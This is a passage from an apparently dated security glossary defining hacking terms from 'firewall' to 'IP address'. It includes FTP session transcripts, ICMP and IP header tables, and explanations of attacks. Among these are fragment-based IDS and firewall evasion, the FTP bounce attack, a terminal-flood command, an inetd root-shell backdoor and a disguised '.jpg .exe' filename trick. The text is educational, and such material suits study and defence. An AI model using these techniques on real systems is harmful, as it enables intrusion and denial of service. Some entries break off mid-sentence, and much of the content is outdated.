Misunderstanding: A common question posed is "what is the best firewall?". People who ask the question mean "what stops hackers the best?". This is based upon the same misunderstanding highlighted above: firewalls isolate you from the Internet in the hopes of reducing exposure to hackers. The best firewall that will protect you best from hackers is therefore to completely isolate yourself from the Internet (i.e. don't use the Internet at all). If you want to use the Internet, then you will have some risk due to hackers that firewalls cannot prevent. For example, if you tell the firewall to accept incoming e-mail, then you are suddenly at risk to hacks against e-mail (either viruses, or attempts to force spam through your server). Therefore, the most secure firewall tends to be the cheapest, such as the basic packet filters built into most routers and operating systems. The more expensive firewalls allow you to secure more applications through the firewall, but the more features that you use, the more applications you expose, and ultimately the more risk you undertake.

Misunderstanding: Some vendors are selling personal firewalls. This is based upon the misconception highlighted above: firewalls do not block hacker traffic, they are instead a (blunt) tool that allows security administrators to reduce risk. Putting packet filters in the hands of end-users doesn't give them the necessary expertise to secure their systems against hackers. There is also the issue that properly configuring a firewall is actually more difficult than hardening a single machine in the first place. It is only worthwhile because one firewall controls access to hundreds/thousands of machines. Putting a single firewall on a single machine isn't really worth the effort.

flood [3]

A class of hacker attack whereby the victim is flooded with information.

Examples:

The DDoS attacks of early 2000: Major websites where flooded with traffic, clogging their 1-gbps high-bandwidth Internet connections.
IRC: A user in the chatroom is flooded with commands, or the user's client is triggered into flooding the server with commands. Either way, the user has to log out or is kicked off.
RalF: In the olden days, a UNIX command that looks like ls / -RalF > /dev/tty1 would flood a user's terminal with huge quanitities of text, forcing them to logout.

forensics [3].

In anti-hacking, forensics is the science of sifting through clues looking for evidence.

Examples:

firewall: The firewall can often provice clues, as described in my firewall forensics document.
sniffer: Sniffing packets can reveal clues as to the identity of the intruder.
hard drive: Law enforcement will frequently confiscate the hacker's hard drive. They have the ability to not only recover deleted files, but also recover files that have been overwritten.

fragment [4]

The IP protocol has the ability to fragment one large IP packet into smaller packets. The receiver than reassembles them before forwarding the data up to the application, making this invisible. Fragmentation is necessary because IP is designed as an abstraction above local links. Since different links support different maximum packet sizes, some routers on the Internet can receive packets larger than can be transmitted along the next hop in the path. Therefore, IP allows 64-kilobyte packets even though most links cannot handle that size.

Example: Ethernet supports a maximum packet size of 1500 bytes. Therefore, in order to send an IP packet of 2000 bytes, the system must first fragment the packet into two pieces before transmission. The other end will then reassemble them back into a single packet on the other end.

Contrast: The general concept of fragmentation applies to all layers of the protocol stack. For example, ATM has a maximum frame size of 48-bytes, which is too small and inefficient for any purpose if higher layers had to deal with it. Therefore, the ATM adapter itself handles the fragmentation and presents a "virtual" interface that allows a full 64-kilobyte packet to be sent without IP level fragmentation. Conversely, when reading files from a file server, even a 64-kilobyte packet size is too small, so the file server layer automatically requests smaller parts of the file. In some cases, applications will attempt to calculate the MTU (Maximum Transmission Unit) of the connection in order to optimize operations to avoid any IP fragmentation.

Key point: IP fragmentation is slow, and is better handled either below the IP layer (like ATM) or above it (like in the application layer).

Key point: Fragmentation and reassembly is difficult to program right. Therefore, there are numerous ways to hack this feature. Some attacks are:

firewall evasion: By fragmenting packets in the middle of the TCP header, firewalls can no longer filter according to port number. This technique has been used to successfully penetrate firewalls, though most now defend against this.
ping of death: Each fragment has an offset (from start of the pre-fragmented packet) and a length. While neither the offset or the length can be greater than 65536, when added together, they can extend past the 65536 packet size limit. Prior to 1995, few systems checked for this, allowing fragmented packets to be created that would cause a buffer-overflow. While normally this would require building the packets by hand, Windows would actually send such fragments using the built-in ping command.
teardrop: In normal practice, you cannot create cases where IP fragments overlap. Therefore, hackers have found numerous techniques of creating overlapping IP fragments that cause systems to crash. The first of these attacks was called teardrop and would crash both Windows and Linux systems. Subsequent variations where known as bonk, boink, newtear, newtear2, and syndrop.
floods: Fragmentation code is very slow. Therefore, an easy DoS is to send huge amounts of fragmented traffic at a system. One way is to use the ping command to send large pings as fast as it can; another is to use libnet to hand-craft packets.

Key point: Most network-based intrusion detection systems do not reassemble packets. Therefore, a hacker can use something like fragrouter in order to evade the IDS.

Key point: Fragmentation is almost never needed. Most communication runs over TCP, which does its own segmentation which is more efficient. Therefore, if you see any fragmentation on your network, you should examine it closely to see if it indicates an attack.

FTP (File Transfer Protocol)[2]

Before HTTP, FTP was the most popular protocol for downloading files across the Internet.

Key point: FTP uses an outgoing control connection that only sends commands to the server and receives returned status information. All data is transfered on separate connections (one connection for each file or directory transfered).

Key point: Before the web (and graphical browsers) people used command-line versions of FTP. These are still prefered by hackers, becauase GUIs are often too "noisy" (generating unnecessary commands). Such command-line clients that are still included in virtually all UNIX or Windows systems.

Key point: These separate connections are created by sending a PORT command across the control connection. This command accepts both and IP address as well as port number that tells the other side where to connect. Example: PORT 192,2,0,201,10,1 is the string sent across the control connection to tell the server that the client has opened a port on the machine with the IP address 192.2.0.201 with port 2561. The server will then open up a TCP connection as intructed. This command is sent invisibly when the client requests a directory listing or file; all the client sees of this happening is a status message to the effect 200 PORT command successful. which is sent back across the control connection. A neat hack is to specify somebody else's IP address in this command. This hack is called a bounce attack, and can be used to port scan computers or subvert trust relationships.

Key point: An outgoing connection is used for control, but the data is sent on an incoming connection. Packet filtering firewalls block incoming connections. Therefore, a user will see that they can connect to the FTP server, but directory listings and file transfers don't work.

Key point: In order to solve the incoming connection problem, FTP supports a mode called PASV that forces all connections to be outgoing. Web-browsers like IE and Netscape use PASV mode by default. Command-line FTP clients typically don't support PASV; but people try "quote PASV" commands anyway.

Key point: Lots of FTP servers have buffer overflow exploits in them.

Key point: The control connection is text based, so you can use Telnet or netcat as your client (if you understand the protocol).

Protocol:
-> Connection from client to ftp.robertgraham.com:21
<-220 ftp.robertgraham.com Microsoft FTP Service (Version 4.0).
->USER anonymous
<-331 Anonymous access allowed, send identity (e-mail name) as password.
->PASS test@robertgraham.com
<-230 Anonymous user logged in.
->PORT 192,0,2,123,10,37
<-200 PORT command successful.
->RETR /example.txt
<-150 Opening ASCII mode data connection for example.txt(14 bytes).

<- Connection from ftp.robertgraham.com:20 to client:2597
<- File contents
<- Close connection

<-226 Transfer complete.
->QUIT
<-221
-> Close connection
An example with a PASV connection is:
-> Connection from client to ftp.robertgraham.com:21
<-220 ftp.robertgraham.com Microsoft FTP Service (Version 4.0).
->USER anonymous
<-331 Anonymous access allowed, send identity (e-mail name) as password.
->PASS mozilla@
<-230 Anonymous user logged in.
->PASV
<-227 Entering Passive Mode (209,31,36,212,6,123).
->RETR /example.txt

-> Connection from client to ftp.robertgraham.com:1659

<-125 Data connection already open; Transfer starting.

<- File contents
<- Close connection

<-226 Transfer complete.
->QUIT
<-221
-> Close connection
A common attack against this protocol is to scan for banners that indicate vulnerable versions. Common vulnerabilities are buffer overflows in the USER name and PASSword fields. An interesting attack is via

- G -

grind [2]

To continually guess passwords to find the correct one.

Analogy: If someone steals your bank card, they cannot sit in front of the cash machine and guess all possible PIN numbers. After a certain number of unsuccessful tries, the bank machine will "eat" the card.

Key point: Secure systems (UNIX, Windows NT) lock out accounts after a certain number of unsuccessful tries. These lock-outs can either be temporary (and restore themselves automatically), or permanent until an administrator intervene and unlocks the account.

Key point: Non-secure systems (Win9x and many software applications) do not lock out accounts. For example, if you have Win9x "File and Print Sharing" turned on and protected with a password, a hacker can try continuously and invisibly to gain access to your machine. Nothing is logged, nothing is locked out.

Contrast: When brute-force cracking, the hacker does all the calculations himself (comparing them against the stolen encrypted password file). When doing a grind, the hacker must enter the passwords one by one, and the target system does the calculations to see if they are valid. An intrusion detection system can detect grinds, but not cracks.

grok [2]

To understand, utterly.

History: The word comes from the book Stranger in a Strange Land by Robert Heinlein. This was a popular counter-culture book in the 1960s, and is a popular Science Fiction book today.

Key point: One of the precepts of Zen philosophy is that the important concepts of life cannot be described by words, and therefore there exists no written description to the path of enlightenment. Grokking means to understand something at a level beyond what mere words can express.

Key point: There are three levels of understanding, which can be illustrated by looking at a cars engine. At the first level, people look at all the parts and say to themselves "This is unnecessarily complicated, I'm sure there is a way we can remove many of these parts and make it simpler". Probably 99% of the population approaches life in this manner. The second level is an engineer who understands how the engine works, and how the various parts work together in the ingeneous fashion that they do. This engineer understands that this the simplest way to produce an engine, and that it has reached this stage after years of being perfected by countless engineers. At the third level is the godlike engineer that understands how to remove one part in order to make the engine even simpler. In this analogy, the engine is the computer. Likewise, the Internet is populated by script-kiddies who are constantly searching for ways to learn about hacking without being bothered by all the unnecessary complexity.

Key point: The failure to grok is often due to failure to understand the correct abstractions. Understanding a thing requires understanding the context in which that thing lives. If one cannot step out of a traditional context in order to regard a thing within the proper context, one cannot grok it. For example, many people have trouble grok the layering of network protocol because the only can only see what the protocols due for them, not what the protocols due in general. Therefore, when they look at protocols, all they see is large amounts of inscrutable unnecessary complexity.

- H -

hacker [1] .

A hacker is someone who is able to manipulate the inner workings of computers, information, and technology.

Consider Arthur C. Clark's Third Law: "Any sufficiently advanced technology is indistinguishable from magic". Since normal people have no clue as to how computers work, they often view hackers with suspicion and awe (as magicians, sorcerers, witches, and warlocks). This suspicion leads to the word "hacker" having the connotation of someone up to no good.

History: The word "hacker" started out in the 14th century to mean somebody who was inexperienced or unskilled at a particular activity (such as a golf hacker).

In the 1970s, the word "hacker" was used by computer enthusiasts to refer to themselves. This reflected the way enthusiasts approach computers: they eschew formal education and play around with the computer until they can get it to work. (In much the same way, a golf hacker keeps hacking at the golf ball until they get it in the hole).

Furthermore, as "experts" learn about the technology, the more they realize how much they don't know (especially about the implications of technology). When experts refer to themselves as "hackers", they are making a Socratic statement that they truely know nothing. For more information on this connotation, see ESR's computer enthusiast "Jargon File".

Key point: Today if you do a quick search of "hacker" in a search engine, you will still occasional uses of the word in senses used in the 1400s and 1970s, but the overwhelming usage in the 1990s describes people who break into computers using their sorcerous ways. Likewise, the vast majority of websites with the word "hack" in their title refer to illegitimate entry into computer systems, with notable exceptions like http://www.hacker.com (which refers to golf).

Controversy: The computer-enthusiast community often refers to any malicious hacker as a "cracker". The security-community restricts the use of the word "cracker" to some who breaks encryption and copy-protection schemes.

Consequently, a journalist who writes about cybercriminals cannot use either word without hate mail from the opposing community claiming they are using the word incorrectly. If a journalists writes about hackers breaking into computers, they will receive hate-mail claiming that not all hackers are malicious, and the that the correct word is "cracker". Likewise, if they write about crackers breaking into computers, they will receive hate-mail claiming that crackes only break codes, but its hackers who break into systems. The best choice probably depends upon the audience; for example one should definately talk about malicious crackers in a computer-enthusiast magazine like "Linux Today".

harden [3]

The word "harden" implies putting a shell around a computer in order to protect it from intruders. In order to harden a system, you should consider the following techniques:

Patch the OS with the latest security fixes. For example, when the "ping-of-death" DoS attack came out, many people needed to patch their TCP/IP stacks to defend against it.
Patch the exposed services with the latest security fixes. For example, many third-party mail servers have been vulnerable to buffer overflow exploits. These are normally fixed a few weeks after being published in the hacker community. Therefore, you need to regularly check with the software vendor for the latest patch.
Remove all defaults. In order to make their software easy-to-use, vendors include default accounts, default passwords, and samples. However, these can generally be exploited by hackers. You MUST read security guidelines for the particular OS or software package (especially web-server) and carefully remove these defaults/samples, or your box WILL be hacked. For example, most Microsoft IIS 4 webservers can be compromised with either the .htr buffer overflow or RDO exploits, because webmasters forget (or don't know) to turn them off.
Remove all unnecessary services. For example, most Sun Solaris based systems can be hacked through the RPC services.
Install packet filtering software. This can either be a firewall

hash [3]

A technique for running data through mathematical operations in order to generate a unique "fingerprint". Any change in the data, either accidental or intentional, results in a completely different fingerprint.

Example: The program "tripwire" detects intrusions by calculating a hash of all programs. On a regular basis, it recalculates the hash. If a file has changed, then tripwire will detect a change in the hash. Therefore, one of the first things hackers will do when breaking into a system is to search for such processes running. (Simply looking for the md5 program is a dead giveaway).

Key point: A hash is "one-way" or "nonreversable". This means that a hash cannot be used to recover the original data.

Key point: A typical hash creates a 128-bit value. This means that there must exist multiple messages that generate the same hash. However, while this can happen in theory, we pretend it can't happen in practice. This is less likely to happen than an asteroid colliding with the Earth destroying all life within the next 100 years.

Key point: Another word for "hash" is message digest.

Key point: The MD5 (Message Digest 5) is the most popular hashing algorithm at this point.

hex (hexadecimal)[1]

In computer science, hexadecimal refers to base-16 numbers. These are numbers that use digits in the range: 0123456789ABCDEF. In the C programming language (as well as Java, JavaScript, C++, and other places), hexadecimal numbers are prefixed by a 0x. In this manner, one can tell that the number 0x80 is equivalent to 128 decimal, not 80 decimal.

Key point: Hex is so important because 4-bits have 16-possible combinatins. Therefore, a 4-bit value can be represented by a single hex digit. In this manner, every byte (8-bits) can be represented by two hex digits.

Key point: Script kiddies tend to dismiss hexadecimal as one of those "unnecessary details". In reality, you must be able to comfortably do hex math in your head, and freely convert with binary. You should also be able to interpret hexdumps, where a block of data is dumped out into columns of hex numbers. A tutorial for this is at http://www.robertgraham.com/pubs/sniffing-faq.html#hexadecimal.

Key point: My mother, an otherwise avowed computerphobe, calculates her age in hex. She is in her early 0x30s. (For those who cannot do the math as well as my mom, 0x30 == 3*16 == 48).

HHGTTG [1]

The book The Hitchhiker's Guide to the Galaxy by Douglas Adams. Many cultural references in the hacking community refer to this book. It is popular because it demonstrates much of the lateral, zen-like thinking used in hacking.

Example: The following quote describes a social engineering attack:

The Hitchhiker's Guide to the Galaxy has a few things to say on the subject of towels.
A towel, it says, is about the most massively useful thing an interstellar hitchhiker can have. Partly it has great practical value. You can wrap it around you for warmth as you bound across the cold moons of Jaglan Beta; you can lie on it on the brilliant marble-sanded beaches of Santraginus V, inhaling the heady sea vapors; you can sleep under it beneath the stars which shine so redly on the desert world of Kakrafoon; use it to sail a miniraft down the slow heavy River Moth; wet it for use in hand-to-hand combat; wrap it round your head to ward off noxious fumes or avoid the gaze of the Ravenous Bugblatter Beast of Traal (a mind-bogglingly stupid animal, it assumes that if you can't see it, it can't see you-daft as a brush, but very very ravenous); you can wave your towel in emergencies as a distress signal, and of course dry yourself off with it if it still seems to be clean enough.
More importantly, a towel has immense psychological value. For some reason, if a strag (strag: nonhitchhiker) discovers that a hitchhiker has his towel with him, he will automatically assume that he is also in possession of a toothbrush, washcloth, soap, tin of biscuits, flask, compass, map, ball of string, gnat spray, wet-weather gear, space suit, etc., etc. Furthermore, the strag will then happily lend the hitchhiker any of these or a dozen other items that the hitchhiker might accidentally have "lost." What the strag will think is that any man who can hitch the length and breadth of the Galaxy, rough it, slum it, struggle against terrible odds, win through and still know where his towel is, is clearly a man to be reckoned with.
Hence a phrase that has passed into hitchhiking slang, as in "Hey, you sass that hoopy Ford Prefect? There's a frood who really knows where his towel is." (Sass: know, be aware of, meet, have sex with; hoopy: really together guy; frood: really amazingly together guy.)

Key point: The answer to life, the universe, and everything is 42.

hijack[3]

An attack whereby the hacker attempts to take over one side of an existing (authenticated) connection. Since authentication generally takes place only at the start of a connection, this will allow the hacker to fully masquarade as the other side without further security checks.

Example: ISPs generally reassign IP addresses of dialing users very quickly after a previous user hung up. Take for example where Alice dials up the Internet, telnets to a host, then for some reason hangs up without gracefully closing the connection. Now consider Mark, who dials-up later and is assigned the same IP address. Let's say that Mark has created his own TCP/IP stack that automatically hijacks any existing connection. The server then sends some response packet back across the connection to Alice (really Mark). At that point, Mark's stack automatically picks up the connection and continues the protocol. At this point, Mark can do anything he wants on Alice's account.

Example: Similar to above, hackers often hijack connections by first nuking one end of the connection, then spoofing that side's IP address.

Example: Spammers scour the Internet looking for open USENET NNTP servers. If they find a server they can post floods of spam through, this is known as "hijacking" the server.

honeypot[4]

An intrusion detection system that pretends to be a valid system, possibly even one that can easily be exploited in order to break into the system.

Misunderstanding: A common misconception is that by advertising the system or inviting hackers in causes you to lose all rights to prosecute the hacker. Honeypots do not advertise themselves nor invite hackers. They simply sit on the network waiting to be discovered and hacked. If a hacker doesn't search them out, they won't find them. Similarly, honeypots can contain legal notices in their banners telling hackers to go away.

H/P/V/C/A (Hack/Phreak/Virii/Crack/Anarchy)[2]

A common abbreviation that represents much of the hacking underground. The organizing principle of the underground is that of anarchy, in particular cybercrimes like cracking software, creating viruses, phreaking the phone system, and hacking into computers.

Culture: The term is an outgrowth of the older abbreviation "h/p" (hack/phreak).

HTTP [1]

Hyper-Text Transfer Protocol.

Key point: HTTP is text based, so you can use Telnet or netcat as your client (if you understand the protocol). For example, you can telnet www.example.com 80 to connect to a web-service and enter the command GET / HTTP/1.0<cr><cr> in order to download the home page.

- I -

ice (Intrusion Countermeasure Electronics) [2]

In hacker culture, the word ice refers to anti-hacker countermeasures. The term was originally coined by William Gibson in his book Neuromancer. In this book, Gibson describes various ways that "ice" protects systems from hacker intrusions.

ICMP (Internet Control Message Protocol) [1] .

In the suite, ICMP is serves as a simple control protocol.

Contrast: Whereas the protocols TCP and UDP carry data, ICMP carries only control messages. Therefore, it is unlikely that a hacker can break into your machine using ICMP. However, evildoers can use ICMP for other purposes:

They can sometimes tell reroute traffic so that they can spy on your machine.
They can DoS your machine.
They use pings and other ICMP messages to scan your systems.

Misunderstanding: Packet filtering firewalls work by filtering source/destination ports in the TCP or UDP transport protocols. However, as a secondary function, they also filter ICMP type and code numbers. In order to simplify configuration, they sometimes call these fields "ports" in order to make the configuration similar to TCP or UDP.

Key point: A common question is which ICMP traffic should be filtered by a firewall. ICMP consists of "control" messages, some of which are needed, others are desireable, and still others can be used to cause problems on your network. At minimum, you need to allow "can't fragment" messages so that TCP path MTU discovery. People usually like such packets as "destination unreachable" so that connections timeout faster with a more helpful error message. Likewise, users like to do pings and traceroutes through the firewall. Other than that, all other packets should be filtered. In particular, ICMP router advertisements and redirects are extremely bad to allow through your firewall.

ICMP Format:

An ICMP header is 8-bytes (64-bits) long. It may contain more data depending upon the exact operation being performed.


    0                   1                   2                   3

    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |     Type      |     Code      |          Checksum             |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |                                                               |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Type ^	This 8-bit field contains the major type number. See http://www.robertgraham.com/pubs/firewall-seen.html#icmp for more information.
Code ^	This 8-bit field contains the minor type (or subtype). For many types, it is simply zero.

ICMP Type/Codes:

The full list of these codes is at: http://www.isi.edu/in-notes/iana/assignments/icmp-parameters

Type Code Name Summary

0 * Echo Reply
ICMP_ECHOREPLY
ping reply A response to a ping. Many firewalls allow ping responses so that internal people can gain access to external resources. Therefore, they are an effective flooding technique. This means they also work well as a covert-channel. The massive DDoS attacks that took down the major Internet portals used commands embedded within ping responses to initiate the attacks. One of the attacks also used ping replies to flood the servers.
Firewall: Either block incoming ping responses or rate limit them.
[more]
3 * Destination Unreachable
ICMP_UNREACH An indication back from a host/router that some you sent packet did not reach its destination.
Firewall: In practice, these are needed simply for helpful error messages why communication failed. The only one strictly needed through a firewall is the one that indicates a router couldn't fragment a packet.
[more]
0 Net Unreachable
ICMP_UNREACH_NET Route configuration problem or incorrectly specified IP address.
[more]
1 Host Unreachable
ICMP_UNREACH_HOST It means that the router one hop before the desired host could not ARP the host.
2 Protocol Unreachable
ICMP_UNREACH_PROTOCOL This means that the receiver of the packet does not have anything that recognizes the specified IP protocol of the packet.
Key point: This is almost never seen on the wire in practice, and either indicates and intrusion or some massive configuration error.
3 Port unreachable
ICMP_UNREACH_PORT The server tells the client that nobody is listening at the port the client attempted to contact.
[more]
4 Fragmentation Needed but DF set
ICMP_UNREACH_NEEDFRAG Important: If you are seeing these in your firewall reject logs, then you've misconfigured your firewall. You should allow this packet to pass through, otherwise your clients will see their TCP connections mysteriously hang.
[more]
4 * Source Quench
ICMP_SOURCEQUENCH Congestion on the Internet. Somebody could flood your network with these packets in an attempt to convince your machines to slow down transmitting data.
[more]
5 * Redirect
ICMP_REDIRECT Somebody is trying to redirect your default router. This could be from a hacker trying to execute a man-in-the-middle attack against you by causing you to route through their own machine.
[RFC792]
8 * Echo Request
ICMP_ECHO
Ping Ping.
[more]
9 * Router Advertisement
ICMP_ROUTERADVERT There is exists a hack against Win9x and Solaris such that a hacker can DoS you by redirecting your default router. A neighboring hacker can also do a man-in-the-middle attack by directing you through his/her router.
[RFC1256]
11 * Time Exceeded In Transit
ICMP_TIMXCEED It means that a packet never reached its target because something timed out.
0 TTL Exceeded
ICMP_TIMXCEED_INTRANS Router dropped the packet either because of a routing loop or maybe because of a traceroute.
[more]
1 Fragment reassembly timeout
ICMP_TIMXCEED_REASS The host dropped the packet because it didn't receive all the fragments.
[more]
12 * Parameter Problem Something unusual is going on, and probably indicates an attack.
[more]
13 * Timestamp
ICMP_TSTAMP
[RFC792]
14 * Timestamp Reply
ICMP_TSTAMPREPLY
[RFC792]

ICQ [1]

An instant messager service from www.mirabilis.com, now AOL.

Key point: ICQ is a favorite service among hackers, and ICQ features are built into many trojans (such as stealing user's passwords, UINs, or notifying the hacker).

Vulnerabilities: Some versions contain a built-in webserver that under Win9x can be used to access any file on the system. Some versions have a problem such that you can send a file to a victim with the filename:


foo.jpg

.exe

This is really a program, but it appears to the user as a .jpg file, so they will simply open it, not realizing it is program. ICQ inboxes can be easily flooded; there are lots of attacks/countermeasures floating around on the Internet for this. Finding somebodies IP address given their UIN is a hot topic: Mirabilis tries to hide this, but lots of tools exist to discover it anyway.

identd / auth [1]

The identd (also known as auth) service on UNIX can be used to identify the owner of a TCP connection. As the auth name implies, it was originally intended to be used as some sort of authentication mechanism. Nowadays, it is most commonly used simply as a way of logging who does what activity.

Example: When you connect to a UNIX-based mail server, it will usually attempt a reverse connection back to you on the identd port 113. Its goal is simply to log which user was attempting access to the server.

IDS (intrusion detection system) [1]

An IDS is a security countermeasure. It monitors things looking for signs of intruders.

Contrast: A host-based IDS monitor system events, logfiles, and so forth. A network-based IDS monitors network traffic, usually promiscuously.

Contrast: A firewall simply blocks openings into your network/system, but cannot distinguish between good/bad activity. Therefore, if you need to allow an opening to a system (like a webserver), then a firewall cannot protect against intrusion attempts against this opening. In contrast, intrusion detection systems can monitor for hostile activity on these openings.

More: See http://www.robertgraham.com/pubs/network-intrusion-detection.html for more info.

IIS [1]

Microsoft's Internet Information Server.

Key point: At the end of 1999, all freshly installed IIS v4.0 servers were vulnerable to the .htr buffer overflow bug and the RDO exploit. Roughly 90% of IIS servers are not sufficiently hardened against these exploits, and are thus vulnerable to being owned or defaced.

IMAP (Internet Mail Access Protocol) IMAP4 [1]

IMAP is a popular protocol for users to retrieve e-mail from servers. It is likely supported by the mail client that you use, such as Netscape or Outlook.

Key point: IMAP is important to hackers because many implementations are vulnerable to buffer overflow exploits. In particular, a popular distribution of Linux shipped with a vulnerable IMAP service that was enabled by default. Therefore, even today, security professionals frequently detect scans directed at port 143 looking for vulnerable IMAP servers.

incident team [3]

A team within a company who is responsible for responding to cyber-attacks.

Key point: The following are useful resources to such a team:

CERT (Computer Emergency Response Team): The oldest incident organization, established in response to the Morris Worm.
CIAC (Computer Incident Advisory Capability): Organization similar to CERT setup by the U.S. DoE (Department of Energy).
http://www.securityfocus.com: They have an INCIDENTS mailing list companion to their BUGTRAQ mailing list where people discuss incidents they've seen.

inetd [3]

The subsystem in UNIX responsible for starting most of the network services. This program works from the principle that one service can listen for incoming traffic on a socket, and when such traffic appears, it can launch the appropriate service to handle it. This allows a single box to support many services without actually having them all run at the same time.

The file /etc/inetd.conf configures this service.

Key point: A common backdoor technique is to place a root shell program in inetd.conf.

infosec (Information Security)[3].

Contrast: The term "information security" distinguishes itself from "physical security".

Key point: The infosec field is often broken down in the following categories:

confidentiality: Prevent unauthorized disclosure of information. (antonym: disclosure)
integrity: Making sure that things cannot be corrupted. (antonym: corruption)
availability: (antonym: Denial-of-Service)
accountability: Making sure that people can be held responisble for their actions. (antonym: anonymity). This includes finding out who violated security policies, as well as simple things as charging departments for their use of network resources.
non-repudiation: Making sure that both sides of a transaction cannot later deny the transaction took place. (antonym: repudiation/renounce/reject)

Key point: The fields of infosec and hacking are not necessarily related. This is a little confusing. Infosec is the field of assuring that information is secure. Hacking is the field of breaking rules. For example, following infosec best practices, you can validate that a server is secure, data is encrypted, and that only authenticated users can gain access. However, a hacker executing a buffer overflow expoit gains access bypassing all the security measures.

input validation [3]

A classic programming error that leads to exploits. Programmers do not always verify that the input data is correct. Therefore, the hacker can carefully craft input that compromises the system.

See also: buffer overflow, directory climbing

IP [4] .

Internet Protocol

Key point: All data on the Internet is carried by IP packets.

Key point: IP is an unreliable datagram protocol, meaning that routers may sometimes drop packets during congestion. A protocol like TCP must be added to IP in order to track packets and resend them if necessary.

Key point: The ability to manipulate IP headers by programs is limited, so there are few defenses against such techniques. Many hacks rely upon low-level manipulation of headers.

Key point: The IP header is shown below. Since IP is carried across a link between router-router or host-router, link headers like Ethernet, PPP, etc. may come before this header. Likewise, the payload of the IP packet comes after this header.

Format:


    0                   1                   2                   3   

    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |Version|  IHL  |Type of Service|          Total Length         |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |         Identification        |Flags|      Fragment Offset    |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |  Time to Live |    Protocol   |         Header Checksum       |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |                       Source Address                          |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |                    Destination Address                        |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |                    Options                    |    Padding    |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Version ^	This 4-bit field always has a value of "0100" (binary) or "4" decimal. Many plan to replace IPv4 with the much more complex IPv6 in order to solve addressing and security issues.
IHL (Initial Header Length) ^	Indicates the length of the IP header. The length of the header is always "20-bytes" unless options are present.
Type of Service (ToS) ^	Not really used, the ToS field gives hints to the router how the packet should be routed. The typical example is a connection between Las Angeles and New York where a router can choose to send the packet across a low-speed land-line (dial-up) vs. a high-speed satellite connection. The latency for a land-line is a few milliseconds, whereas a satellite can be about a second. Therefore, you want the low-latency for interactive connections like Telnet, but you want the high badwidth for connections like FTP. Since this field isn't really used that much, hackers can use it as a covert channel.
Total Length ^	The total length of the IP datagram once the packet has been reassembled. See: fragmentation.
Identification ^	A unique ID number for the entire packet. All fragments of a packet carry the same ID. Key point: Tracking the ID field over time can help fingerpint the OS. Key point: Some systems use monotonically increasing IDs, so you monitor activity on a remote machine by pinging it on a regular basis. Key point: A covert channel can be created by encapsulating information in this field. Key point: Windows machines, and many other systems based upon x86 CPUs, will use little-endian ID fields and monotonically increasing numbers. This means that the IP ID that follows 0x1234 will be 0x1334, not 0x1235.
Flags ^	There are two flags that control fragmentation. The DF (Don't Fragment) bit tells routers not to fragment this packet. The MF (More Fragments) bit indicates that this is not the last fragment in the packet. Key point: You can evade network-based IDS sometimes by careful use of the DF bit and oversized packets that must be fragmented. See: fragmentation. Key point: Different systems check the flags differently. For example, in order to test for a SYN (which initiates a connection), code could check using either `(flags == TCP_SYN)` or `(flags & TCP_SYN)`. The first checks to see if the SYN, and only the SYN is set. The second checks for SYN, but ignores the other flags. This can be useful in fingerprinting an OS by or evading an intrusion detection system.
Fragment Offset ^	The offset from the start of the original packet that this fragment starts. Key point: The Ping-of-Death exploit resulted by combining a fragment offset plus fragment length in order to exceed the maximum IP packet size.
Time to Live (TTL) ^	This field indicates how many hops (routers) the packet can pass through before being discarded. Each router who forwards the packet decrements this field by one. When a router decrements the field to zero, it assumes a routing loop has occurred and sends back an ICMP message back to the sender. Key point: Abuse of the TTL field, after fragmentation is the most useful technique for manipulating IP headers. In addition, it is easy to manipulate this field at the sockets layer. Key point: The `traceroute` program finds all the routers in the path to a target by sending out many packets with varying TTL fields. This causes every router to receive a TTL in one of the packets that it zeroes out, causing it to report its existance back to `traceroute`. Key point: Tracerouting through firewalls is sometimes possible by adjusting the TTL of TCP replies.
Protocol ^	This field indicates the next protocol header after the IP header. Examples are a value of 1 for ICMP, 6 for TCP, and 17 for UDP. Key point: Some rootkits use this as a way of invisibly transporting data since most systems cannot detect or log unknown protocols at this layer.
Source Address ^	The IP address of who sent the packet. This is included in every packet so that the destination knows who to respond to, and any errors can likewise be sent back to the sender. Key point: The IP address can be forged (spoofed). This can sometimes be useful despite the fact that it causes any responses to be sent back to the spoofed IP address rather than the real sender.
Destination Address ^	The IP address of where the packet is going to. Each router along the way compares this IP address to internal routing tables in order to figure out which direction to forward the packet.
Options ^	Additional options that can affect how the packet is routed. Multiple options can be specified. Key point: 99.999% of all IP packets have no options. Some IDSs trigger simply whenever they see an option field. Key point: The most common option used for attacks is source routing.
Padding ^	An IP headers must be aligned on even 32-bit boundaries, which may sometimes require nul bytes to be added.

IP address [3]

On the Internet, your IP address is the unique number that others use to send you traffic.

Analogy: You own a phone. You have a phone number. Anybody anywhere in the world can dial your phone number and cause your phone to ring. You own a computer; it has an IP address. Anybody anywhere in the world can send traffic to your machine. In much the same way that you don't have to answer the telephone, if the traffic people send you isn't meaningful, your computer will ignore it. Since the machine generally ignores all unsolicited traffic, casual users on the Internet are rarely aware that hackers somewhere are trying to access their machine.

